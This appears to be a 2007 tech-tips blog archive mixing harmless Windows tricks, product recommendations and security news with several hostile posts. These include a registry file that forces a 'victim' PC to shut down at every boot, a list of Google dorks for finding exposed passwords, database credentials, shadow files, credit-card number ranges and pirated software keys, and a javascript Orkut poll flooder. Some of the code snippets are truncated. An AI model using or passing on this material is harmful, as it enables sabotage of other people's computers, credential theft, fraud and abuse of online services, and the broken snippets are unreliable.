Saturday, June 9, 2007

Block a website in your computer

Need to block a website over your computer? Well, you dont need to download a website blocker for your PC.

You can do it by an inbuilt function in your Windows. Lets see how to block a website in few steps.

1. Browse to C:\windows\system32\drivers\etc
2. Now, open hosts in Notepad.
3. After, press enter and write this: localhost

4. Now, save the file.
5. Reboot your PC.
Now try opening the blocked website. It will not open.

Shut Down your friends' computer each time it starts

Disclaimer: This is a pretty dangerous post. Neither the author nor this blog is responsible for anything that happens to your computer due to this.

Put this following text in a .reg file and run it in the victims pc:

Windows Registry Editor Version 5.00

"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

Don't put it in your computer if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run. navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.

Send Blank Scraps in Orkut

Step1: Open scrapbook

Step2: Write [i] and submit it, an invisible scrap will b send

Note: Don't Write Anything Else [i]
You can try these various combinations also if u want to send a big no of invisible scraps, as after your few submissions it will start displaying the message "message sent too recently". So try these combinations out:


And just keep on increasing it will continue no limits...

One more method

Enter & # 3 0 2 1 without spaces, blank scrap will be send.

View Friends' Scraps more than the limit

Step1: Open Friends scrapbook

Step2: Look in your address bar (i.e the place where u type You will see this address written

Step3: Add this code"&na=&nst=&nid=&pageSize=30" at the end of the address. It will look like this

30 over specifies that you can view 30 scraps of the scrapbook you are looking into.

Google Hacking

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.

Try a few of these searches:
intitle:"Index of" passwords modified
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.


put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.

Example: ?intitle:index.of? mp3 jackson


put this string in google search:

inurl:microsoft filetype:iso

You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…

"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!

"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at:

"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net

"http://*:*@www" bangbus or "http://*:*@www"bangbus

Another way is by just typing

"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!

DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)

intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.

Let's pretend you need a serial number for windows xp pro.

In the google search bar type in just like this - "Windows XP Professional" 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR

Friday, June 8, 2007

Best Way to Uninstall

Windows Add/Remove Programs is fine, as far as it goes. Problem is, it doesn't go far enough. It often leaves traces of uninstalled programs in various places on your hard drive, meaning you'll accumulate a lot of junk over time.

This freeware utility does a better job of completely eliminating all traces of the software you want to uninstall. But it does even more:

* Analyze an installation so it can be completely uninstalled (also supports reboots of the computer as the process is split into two: Before and after the installation)
* Find and delete temporary files
* Delete entries from programs that are no longer installed
* Hide Windows Updates
* Hide entries from the list that you are never going to uninstall (drivers etc.) making the list smaller and therefore easier to manage.
* Show more information than available through add/remove
* Automatically find entries from programs that are most likely already uninstalled
* Automatically find entries that are considered "crap-ware"
* (Of course) search the list of installed software

ZSoft Uninstaller 2.3.4

Best Desktop Wallpapers

I like to change my desktop's wallpaper every so often. What can I say, I like variety. Sadly, if you just do a Google search for "desktop wallpapers," you'll likely as not get results containing malware sites.

I've got a web site that offers not only safe wallpaper downloads, but the coolest and most beautiful you'll find anywhere on the Internet.

Visit Desktop Nexus

Submit Bookmarks to multiple sites at once

Tired of submitting your social bookmarks one at a time?

Social Poster is a free web service that allows you to submit to all your favorite social bookmarking sites with one fell swoop. It's got 34 sites, to be exact. What a time saver!

Social Poster

Preview Firefox Tabs using Tab Scope

This thumbnail preview extension for Firefox lets you see what's behind each tab just by hovering your pointer over it. Not only that, you can also navigate using the thumbnail popup (back, forward, reload, stop). You can scroll and click on links in the preview as well. That's tons of functionality that you didn't have before! This one's a must-have.


Thursday, June 7, 2007

McAfee : Yahoo Search Most Risky

Out of the top five search engines, Yahoo returns the riskiest sites for users, according to security vendor McAfee.

In research published by McAfee SiteAdvisor, 5.4 percent of Yahoo searches returned links to "risky" internet sites. AOL was found to be the safest of the top five, with 2.9 percent of sites.

According to McAfee SiteAdvisor, Yahoo returned the most results rated "red" or "yellow". "Red" rated sites failed McAfee SiteAdvisor's safety tests. "Examples are sites that distribute adware, send a high volume of spam, or make unauthorised changes to a user's computer," said the report. Examples of "Yellow" rated sites are those which send a high volume of "non-spammy" email, display many pop-up ads, or prompt a user to change browser settings.

According to McAfee, overall, on Yahoo, MSN,, Google, and AOL, sponsored searches returned more risky results than "organic" searches. Of sponsored searches, 6.9 percent returned risky content, compared with 2.9 percent of organic searches.

McAfee analyst Greg Day told that those wishing to make money from the spread of malicious code were willing to pay search companies, or try to trick them, to boost malicious ad rankings and increase the chance of click-throughs to malicious sites. "The simple reality is that, if you want to make money, you get to know how to trick search engines to get to the top [rankings], or you pay your way to get to the top," said Day. "On the straight figures, Yahoo is the highest level risky site."

McAfee stopped short of recommending that IT managers discourage company employees from using Yahoo search, but did say that the search company should employ more rigorous analysis of the content of sites returned by its search. "Google is starting to go away and do analysis of whether [site] content is what it claims to be. Yahoo really has to go down that road."

Yahoo said it already has a rigorous editorial policy on sites displayed by its search results, especially for sponsored results.

Reggie Davis, vice president of marketplace quality at Yahoo, told "We have strict editorial policies in place, conduct ongoing editorial review and employ teams of product experts, engineers and analysts focused on ensuring and continually enhancing the relevancy of our sponsored search ads."

Davis did not seek to refute the McAfee SiteAdvisor research, or its ranking of Yahoo as the most risky search company of the top five. Instead, he stated: "Yahoo has been a strong proponent of helping fight malware, and is, in fact, the only major search vendor who makes free anti-spyware software available to its users. We support any efforts that help with the ongoing fight against unsafe sites."

Davis said that, according to the McAfee research, Yahoo's organic search results, "which represent the vast majority of clicked links for consumers, have the highest safety and quality rating of all major search vendors".

According to Davis, it is not in Yahoo's interest "to deliver experiences that would erode the trust of our users and advertisers, as we are committed to building the world's highest-quality online advertising marketplace and providing the safest and most relevant search experience possible for our users".

"We will continue to improve our performance in this area by investing in technology and work with third parties to make the internet safe for consumers," Davis added.

How to find your IP Address?

To find your IP Address,

1. Go to Start ---> Run
2. Type cmd
3. Command Prompt will open.
4. In that, type ipconfig /all
5. You will see your IP Address

Hiding your IP Address using Proxy Server

If you want to hide your Internet Protocol Address from website administrators using code to track you, you can use a proxy server to hide your IP. There are millions of proxy server in the internet..Just search Proxy Server in Google. You will get a very BIG list..


1. Go to
2. Type the website address there after selecting the language.
3. Then press Enter.
4. You are now viewing the website anonymously.
5. The Website Administrator does not know your IP Address. He sees a IP Address from some part of the world.

That's it..Want to learn more about IP here

Wednesday, June 6, 2007

Computer Cleaning Tips - Part 2

Although many companies have created products to help improve the process of cleaning your computer and peripherals, users can also use household items to clean their computers and peripherals. Below is a listing of items you may need or want to use while cleaning your computer or computer peripherals.
Keep in mind that some components in your computer may only be able to be cleaned using a product designed for cleaning that component; if this is the case, it will be mentioned in the cleaning tips.

* Cloth - A cloth is the best tool used when rubbing down a component; although paper towels can be used with most hardware, we recommend using a cloth when ever possible.
* Water or rubbing alcohol - When moistening a cloth, it is best to use water or rubbing alcohol. Other solvents may be bad for the plastics used with your computer.
* Portable Vacuum - Sucking the dust, dirt, hair, cigarette particles, and other particles out of a computer can be one of the best methods of cleaning a computer. Over time, these items can restrict the airflow in a computer and cause circuitry to corrode. Do not use a standard vacuum as it can generate a lot of static electricity that can damage your computer.
* Cotton swabs - Cotton swaps moistened with rubbing alcohol or water are excellent tools for wiping hard to reach areas in your keyboard, mouse, and other locations.
* Foam swabs - Whenever possible, it is better to use lint-free swabs such as foam swabs.

Computer Cleaning Tips

Below is a listing of general tips that should be taken when cleaning any of the components or peripherals of a computer as well as tips to help keep a computer clean.

1. Never spray or squirt any type of liquid onto any computer component. If a spray is needed, spray the liquid onto a cloth and then use that cloth to rub down the component.
2. Users can use a vacuum to suck up dirt, dust, or hair around their computer on the outside case and on their keyboards. However, do not use a vacuum for the inside of your computer as it generates a lot of static electricity that can damage the internal components of your computer. If you need to use a vacuum to clean the inside of your computer, use a portable battery powered vacuum designed to do this job.
3. When cleaning a component and/or the computer, turn it off before cleaning.
4. Never get any component inside the computer or any other circuit board damp or wet.
5. Be cautious when using any type of cleaning solvents; some individuals may have allergic reactions to chemicals in cleaning solvents and some solvents can even damage the case. Try to always use water or a highly diluted solvent.
6. When cleaning, be careful not to accidentally adjust any knobs or controls. In addition, when cleaning the back of the computer, if anything is plugged in, make sure not to disconnect any of the plugs.
7. When cleaning fans, especially the smaller fans within a portable computer or laptop it's suggested that you either hold the fan or place something in-between the fan blades to prevent it from spinning. Spraying compressed air into a fan or cleaning a fan with a vacuum may cause damage to some fans.
8. Never eat or drink around the computer.
9. Limit smoking around the computer.

Delete Special Folders

Don't you just hate those stubborn stupid icons that refuse to leave the desktop, like the Recycle Bin icon. I am sure you want to know how you can delete them. You may say, that is really simple, simply right click on the concerned icon and select Delete. Well not exactly, you see when you right click on these special folders( see entire list below)neither the rename nor the delete option does not appear. To delete these folders, there are two methods, the first one is using the System Policy Editor(Poledit in the Windows installation CD)and the second is using the Registry.

Before we go on, you need to understand what CLSID values are. These folders, like the Control Panel, Inbox, The Microsoft Network, Dial Up Networking etc are system folders. Each system folder has a unique CLSID key or the Class ID which is a 16-byte value which identifies an individual object that points to a corresponding key in the registry.

To delete these system Folders from the desktop simply go to the following registry key:


To delete an icon simply delete the 16 byte CLSID value within "NameSpace". The following are the CLSID values of the most commonly used icons:

My Briefcase:{85BBD920-42AO-1069-A2E4-08002B30309D}
Desktop: {00021400-0000-0000-C000-0000000000046}
Control Panel:{21EC2020-3AEA-1069-A2DD-08002B30309D}
Fonts: {BD84B380-8CA2-1069-AB1D-08000948534}
Inbox :{00020D76-0000-0000-C000-000000000046}
My Computer :{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Network Neighborhood:{208D2C60-3AEA-1069-A2D7-O8002B30309D}
Printers :{2227A280-3AEA-1069-A2DE-O8002B30309D}
Recycle Bin :{645FF040-5081-101B-9F08-00AA002F954E}
The Microsoft Network:{00028B00-0000-0000-C000-000000000046}
History: {FF393560-C2A7-11CF-BFF4-444553540000}
Winzip :{E0D79300-84BE-11CE-9641-444553540000}

For example, to delete the Recycle Bin, first note down it's CLSID value, which is: 645FF040-5081-101B-9F08-00AA002F954E. Now go to the Namespace key in the registry and delete the corresponding key.


Detected: First Virus in IPODS

Hackers and virus creators have finally infected the Apple iPod - albeit very marginally since it affects only iPods with the Linux operating system
(about 0.01% of all iPods).

Kasperksy Lab calls it the 'Podloso' while security major F-secure has named the virus ''. According to a report by Kaspersky Lab, the user has to save the virus to the iPod memory for the device to become infected.

iPod Linux is a CLinux-based software distribution targeted specifically to run on Apple iPods, and it enables users to run a variety of third party software such as games. With 70 million pieces the world over, the iPod is the most used music gadget. This virus, however, does not infect iPods that run the default iPod operating system.

According to the test carried by Kaspersky, once launched, the virus scans the device's hard disk and infects all executable .elf format files. Any attempt to launch these files will cause the virus to display a message on the screen which says "You are infected with Oslo the first iPodLinux Virus".

Podloso working only on iPods running Linux implies that almost 99.9 per cent of all iPods which run Windows or Apple operating systems are spared. Technically, however, it's not even the first virus to be targeted at iPods. Last October, Apple announced that less then 1 per cent of video iPods released after September 12 carried a Windows virus. The RavMonE.exe virus spreads via mass storage devises and affected Windows computers -- not the infected ipods.

Secure your Desktop Icons and Settings

You can save your desktop settings and secure it from your nerdy friend by playing with the registry. Simply launch the Registry Editor go to:

In the right pane create a new DWORD Value named NoSaveSettings and modify it's value to 1. Refresh and restart for the settings to get saved.

Tuesday, June 5, 2007

Orkut Poll Flooder

1. Go to poll page

2. CODE:

javascript:opcao=prompt("enter option u want to flood eg like 1 or 2 or 3 or 4...","");votos=prompt("enter no. of votes?\n31 max",31);send = "POST_TOKEN="+encodeURIComponent(document.getElementsByName('POST_TOKEN')[0].value)+"&signature="+encodeURIComponent(document.getElementsByName('signature')[0].value);for(x=0; x

3. Paste this code in the address bar
4. Press Enter
5. It will ask you what option to vote for
6. Give the option number i.e. 1 or 2 or 3....
7. It will ask how many votes to flood
8. The maximum is 31 from each profile
9. Type the number of votes for that option
10. You are done

Orkut Scrap Flooder

1. Go to the scrapbook
2. Type some text to flood
3. Download the code here...I am not able to post it here
4. Paste it in the address bar
5. Press Enter dont click Send Scrap

Monday, June 4, 2007

Make your Orkut Page Colorful

1) Open your scrapbook.

2) Copy the following text and paste it in your address bar

javascript: i=0;c=["red","green","blue","yellow","magenta","orange","black","white"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0);

3) Hit ENTER key

Blocking Ads in Yahoo Messenger

Are you using yahoo messenger for Im and chatting with buddies and like me if you are boored with the ads from yahoo, that gets displayed amidst, then here’s a registry edit for windows users which’ll block the ads on yahoo messenger.

Create a new text file in notepad and copy following to it.


Windows Registry Editor Version 5.00


“Chat Adurl”=”"
“Conf Adurl”=”"
“Messenger Ad”=”"
“Webcam Viewer Ad”=”"
“Webcam Viewer Ad Big”=”"
“Webcam Viewer Ad Medium”=”"
“Webcam Upload Ad”=”"
“Change Room Banner”=”"
“Personals Alert Ad URL”=”"
“News Alert Ad URL”=”"
“Mail Alert Ad URL”=”"
“Stock Alert Ad URL”=”"
“Auction Alert Ad URL”=”"
“IMVironment Ad URL”=”"
“Calendar Alert Ad URL”=”"
“Chat Transition Ad”=”"
“Chat Transition Ad”=”"
“N2Phone Adurl”=”"
“Login Mobile Ad”=”"


Save the above file as "yahoo.reg" (u can give any name but .reg extension is compulsory)

Double click the .reg file "yahoo.reg" that you created now. Then click ok(yes) if asked for confirmation that’ll be added to registry.

Restart yahoo messenger.It’s done now.Enjoy.

Mind Mapping Online

Are you a mind-map aficionado? Do you think in terms of bubbles? Then Bubble-Mind is for you. Seriously, many very smart people have increased their productivity by using mind-mapping tools, which are just visual ways of organizing ideas.

A mind map is a diagram used to represent words, ideas, tasks or other items linked to and arranged radially around a central key word or idea. It is used to generate, visualize, structure and classify ideas, and as an aid in study, organization, problem solving, and decision making.

It is an image-centered diagram that represents semantic or other connections between portions of information. By presenting these connections in a radial, non-linear graphical manner, it encourages a brainstorming approach to any given organizational task, eliminating the hurdle of initially establishing an intrinsically appropriate or relevant conceptual framework to work within.

A mind map is similar to a semantic network or cognitive map but there are no formal restrictions on the kinds of links used.

The elements are arranged intuitively according to the importance of the concepts and they are organized into groupings, branches, or areas. The uniform graphic formulation of the semantic structure of information on the method of gathering knowledge, may aid recall of existing memories.

I've just discovered an excellent Web 2.0 mind-mapping tool that you will appreciate whether you're already a mind-mapper or just someone who'd like to see how it works. It's called Bubble-Mind and it can be gotten to here.

There are many costly downloads available that do what this site does for free. Check it out today.

Create Fabulous Online Resumes with Resolio

I've just discovered a Web 2.0 site that I can't wait to use. Once you sign up (free version or premium), you enter your data, choose a design, and publish your new resume. You can publish to Resolio or your own web site.

I plan to design a resume for myself as a freelance writer/editor and link to it on all my web sites. If you've got the gist of it, I'll leave you to it while I start working on my new Resolio resume. You can find it here.

Web 2.0 Button Generator

I'm one of those webmasters who's not a master at designing graphics. Or buttons. That's why I appreciate this site: MyCoolButton. In fact, I've wanted, needed, something like this for a long time. The fat, juicy, shiny, bulging Web 2.0-style buttons are awesome.
Click here to visit the site!

Manage upto Sixteen Email Accounts Simultaneously

Here's a very useful little program that will monitor as many as 16 different email accounts at the same time.

ePrompter automatically and simultaneously checks and retrieves your email messages from up to sixteen password protected email accounts and then gives you notification whenever you have new messages. ePrompter also lets you know how many new messages you have in each account, once new messages have been retrieved.

ePrompter also lets you read, delete and respond to any of your messages with a simple click on the account of your choice - without ever having to launch your email program or go to your webmail's site. Importantly, when ePrompter retrieves messages, it leaves the original messages on your various email accounts' servers and/or webmail sites.

ePrompter supports AIM, AOL, Gmail, Hotmail, Yahoo, Yahoo Beta, POP3, Earthlink, Excite, Juno, Lycos,, Mindspring, MSN, MyWay, Netscape, Rediffmail, SBC Yahoo,, Windows Live Mail, and hundreds of other email domains.

Definitely worth a download. Get it here.

Just One Search. That's All It Took, on Sputtr

What a stupid title. But this search site is very smart. All your favorite search engines and social bookmarking sites gathered in one spot.

Welcome to Sputtr. A refreshingly clean way to search the things that matter the most.
Now you can save valuable time by having all the right searches on just one page!

It's simple - reeeaal simple.
It's fast - faster than most others out there.
It's a collection of all your favorite search engines - all on just one page!
It's pretty - at least we think so.

It is pretty cool. Check it out here.

Web Pages to PDF

HP has made available a free download add-on for Internet Explorer that lets you create PDF documents from the content you find on the web. Rather than install a virtual print driver, it works more like a scrapbook browser extension, allowing you to select the content you want to create your PDF pages.

HP Smart Web Printing lets you select, store and organize text and graphics from multiple web pages and then edit and print exactly what you see onscreen. It gives you the control you need to print meaningful information while minimizing waste.

Selecting content on a web page can be challenging. Now you can easily select text and graphics from multiple websites and combine them in your custom document. Create a personal digital scrapbook for each planning and research project.

Once you transfer content to your custom document, you can edit the text and graphics and even resize and delete them. Then print exactly what you see on screen. HP Smart Web Printing will also save your custom document as an Adobe PDF file.

This is a really great idea. I haven't seen anything else like it anywhere else.

Get it here

Sunday, June 3, 2007

Star Wars Movie in Windows XP

Do u know that Windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.

Go to Starts-->Programs-->Run
And hit enter.........
Enjoy the magic!!!!

Orkut Crush List Explanation

Have you ever wondered how the Orkut "Add to my crush-list" option works?

Most of us are scared to add someone to our crush-list
because of the fear that he/she will get a notification from Orkut that you have added him/her on your crush-list.

YES, they will get such a notification.
But that is only if they too add you on their crush list.
In fact, you both will get a message from Orkut if you both have added each other on your respective crush lists.

This is a fantastic piece of innovation from Orkut wherein one-side crushes
will not be notified and if mutual crush exists, then both sides will come to
know of it.

Spreading this information is important. It will help the cause of many
people and who knows, you may be the lucky one too!!!

So start adding people to your crush-lists now and spreading this vital

Image Roller in Orkut

Follow the steps:
1) Open any page that contains images.
2) Copy the following text and paste it in your address bar

javascript:R=-1;DI=document.images;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(0,7,300);,6,150)}setInterval('R++;B(R%DIL)',15);void(0)

3) Hit ENTER key

Double the size of your Friend's image in Orkut

Follow the steps:
1) Open any profile whose friends' images you wish to double.
2) Copy the following text and paste it in your address bar


3) Hit ENTER key

Google Audio Ads

Qouted directly from Google Blog

Google recently signed a multi-year agreement with Clear Channel Radio, the largest radio station group owner in the U.S. This is an important milestone for us. Under the agreement, Google Audio Ads can sell a portion of guaranteed, premium 30-second advertising inventory on 675 Clear Channel AM & FM stations.

These Clear Channel Radio stations, when combined with our existing radio station partners, give our advertisers access to radio inventory on over 1600 top-rated radio stations throughout the country, with "Top 10" stations in 24 of the top 25 U.S. markets and coverage of over 99% of the U.S. population aged 12 and older (meaning 99% of people 12+ can tune in an hear one of our stations; Source: ACT1 / Arbitron).

Where can you hear our ads? Google Audio Ads run on traditional radio stations that you may listen to at home, at work, in the car, in the gym, at the beach, at the store or thanks to the portability of radio, just about anywhere you can take radio and tune in.

It's a great time to consider doing a radio buy now that it is as easy as AdWords. We'll check back in with some CPG-specific ideas in the near future.

Watch movies with MS Paint

Open your favorite movie player and play the move

Hit "Print Screen", keep playing the movie in the player, don't stop it.

Open MsPaint.

Select "Edit>Paste" Or Hit "Ctrl+V"

Presto! You can watch movies in Paint!

But there are no Pause, Next, Previous, Stop etc. buttons

Windows XP Games Cheats


Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.


Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.


Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.


Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

What do Beeps Mean ?


One Beep :
DRAM refresh failure
This may be due to - Bad memory chips
- A bad DMA Chip
- Bad memory addressing chips on the motherboard

Two Beeps :
Parity error or Parity Circuit failure
-Your memory may not be seated properly on the mother board.
-Unplug and plug it properly

Three Beeps :
Bad memory or bad mother board

Four beeps :

Timer failure in the RAM.

Five Beeps :
CPU chip may be dead

Six Beeps :
Keyboard controller may have failed

Seven beeps :
CPU is dead. Retry the connections and test.
-Replace the whole motherboard.

Eight Beeps :
Video card is missing or Bad.

Nine Beeps :
Damaged ROM BIOS.
-BIOS chip has to be replaced if it persists.

Ten Beeps :
CMOS shutdown.
-Replace CMOS memory and associated chips.

Eleven Beeps :
Cache memory test has failed.
-To enable cache memory try CTRL+ALT+SHIFT++.

One long Beep and Three short Beeps:
Memory failure

One long Beep and Eight short Beeps :
Video card failure.
-Try to install video card in another slot.

No Beeps :
Check Power supply
-Check mother board connections
-Remove all cards except video card and check for system power up
-Insert all cards one at a time and check their operation.
-If system hangs on the installation of a particular card, then it is the cause for the problem and replace it with another of that type and check

Be Careful with Ctrl + C

We do copy various data by ctrl+c for pasting elsewhere. This copied
data is stored in clipboard and is accessible from the net by a
combination of Javascripts and ASP.

Just try this:
1) Copy any text by ctrl+c
2) Click the Link:
3) You will see the text you copied on the Screen which was
accessed by this web page.

Do not keep sensitive data (like passwords, creditcard numbers, PIN
etc.) in the clipboard while surfing the web. It is extremely easy to
extract the text stored in the clipboard to steal your sensitive

Fortunately, the fix for this is also quite simple:

1. In Internet Explorer, go to Tools -> Internet Options -> Security

2. Click on Custom Level (preview image).

3. In the security settings, click to Disable the “Allow Paste Operations via script. That will keep your clipboard contents private

Enable Right Click on Websites that disabled it

Lots of web sites disable the right click function of the mouse button so that people should not steal their pictures or copy, paste their info... but right click can be enabled....

If u have IE6 or more...

Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "OK" a couple of times & you are done...

You'll probably want to turn this back to "enable" when you have finished.

Listen to a book read by your computer

Open Acrobat Reader 6 and above and open the pdf version of the document you want to hear and use the following shortcuts:

Ctrl+ Shift + b ---> To hear the whole document

Ctrl + Shift + v ---> To hear only the page

ctrl + Shift + c ---> To resume

Ctrl + Shift + e ---> To stop

Create Custom Search for websites in Opera

Now You can create search for Your Favourite Websites...
and search easily by just typing your query in OPERA

Example: Creating Search for
» Notice the search option in Orkut at the top right of the browser screen.
» Right-click the search box.
» Select the Create Search.. option
» In the dialog box that popups, fill in details like Name (anything), keyword (enter any characters like o for orkut)

Multiple login in Google Talk

This is very simple and very cool and useful.
Here is how you can do.
All you need is to add /nomutex at the end of the target of ur google talk shortcut.

Example:Suppose ur google talk is installed in c:/ drive.
Than All u need is to make D:\Program Files\Google\Google Talk\googletalk.exe as this
D:\Program Files\Google\Google Talk\googletalk.exe /nomutex

Mind the space between googletalk.exe and /nomutex